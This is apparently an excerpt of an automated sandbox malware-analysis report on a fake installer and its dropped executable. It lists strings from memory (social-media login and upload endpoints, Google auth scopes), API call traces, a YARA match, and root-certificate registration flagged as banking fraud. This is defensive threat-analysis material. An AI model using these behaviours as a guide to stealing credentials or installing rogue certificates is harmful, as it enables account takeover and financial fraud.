Source: ecvAA35.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvAA35.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvAA35.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvAA35.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx8(
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304977853.0000000003D4F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_javal
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305037928.0000000003CB2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304977853.0000000003D4F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp, ecvAA35.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277888575.0000000003E12000.00000004.00000001.sdmp, ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/.?
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.google.com/cloudprint/enab
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278094503.0000000003E07000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprintS5)
Source: 6852B33702F6B3BD.exe, 00000004.00000003.324597044.0000000000792000.00000004.00000001.sdmp, Localwebdata1611946694399.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/calend
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278438029.0000000003E00000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278438029.0000000003E00000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278438029.0000000003E00000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/h
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278438029.0000000003E00000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly~
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangoutsdbox
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings7
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 6852B33702F6B3BD.exeString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278438029.0000000003E00000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvAA35.tmp.11.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.277169134.0000000003DD7000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040AE4D OpenClipboard,11_2_0040AE4D
Source: ThunderFW.exe, 0000001D.00000002.368499973.0000000000DCA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,4_2_1001F720

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 4.2.6852B33702F6B3BD.exe.32a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 5.2.6852B33702F6B3BD.exe.34e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: FileSetup-v17.04.41.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6852B33702F6B3BD.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040C516 NtQuerySystemInformation,11_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,11_2_0040C6FB
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004143EA: CreateFileW,DeviceIoControl,CloseHandle,1_2_004143EA
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0041B161 __EH_prolog,_memset,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,FreeLibrary,CloseHandle,1_2_0041B161
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004060121_2_00406012
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004581C01_2_004581C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004903701_2_00490370
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0049C3FC1_2_0049C3FC
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0049A3A91_2_0049A3A9
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0044E3A01_2_0044E3A0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004AA4541_2_004AA454
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004AE4BE1_2_004AE4BE
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A855F1_2_004A855F
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0046251D1_2_0046251D
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A05C31_2_004A05C3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0046E6001_2_0046E600
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004286901_2_00428690
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0044E7101_2_0044E710
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A27891_2_004A2789
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0043A8201_2_0043A820
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0043E8C01_2_0043E8C0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004568801_2_00456880
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004069191_2_00406919
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00440A401_2_00440A40
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A8AA11_2_004A8AA1
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0044EBB01_2_0044EBB0
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0043EE501_2_0043EE50
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_00490F011_2_00490F01
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004A8FE31_2_004A8FE3
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0044B0001_2_0044B000
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004410001_2_00441000
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004850901_2_00485090
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_004572001_2_00457200
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: 1_2_0043F2D01_2_0043F2D0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000C0634_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000B8834_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100060F04_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100169BD4_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100099E04_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100071F04_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100092574_2_10009257
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_10010AED4_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100083404_2_10008340
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000E3804_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000ABA04_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000B3B04_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001EBD04_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100083F04_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000BC574_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000C4834_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_100105904_2_10010590
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1001EDDB4_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: 4_2_1000FF714_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611946678493.exeCode function: 11_2_00404BE411_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BFA0C329_2_00BFA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF963B29_2_00BF963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF6A1E29_2_00BF6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BFA7BB29_2_00BFA7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BFB51C29_2_00BFB51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 29_2_00BF9B7F29_2_00BF9B7F
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exe A8FEFE8E1F92A30D1CDD4E2E2AFAACF08A02C8961F496EE16E89062417EC5F28
Source: C:\Users\user\AppData\Local\Temp\6852B33702F6B3BD.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 00425DE0 appears 88 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 00499C6C appears 37 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 00494DF0 appears 202 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 00426A70 appears 102 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 004B3A3D appears 38 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 004B39D3 appears 74 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 00427D50 appears 40 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 0048EDF0 appears 40 times
Source: C:\Users\user\Desktop\FileSetup-v17.04.41.exeCode function: String function: 004C3A1C appears 136 times
Source: FileSetup-v17.04.41.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
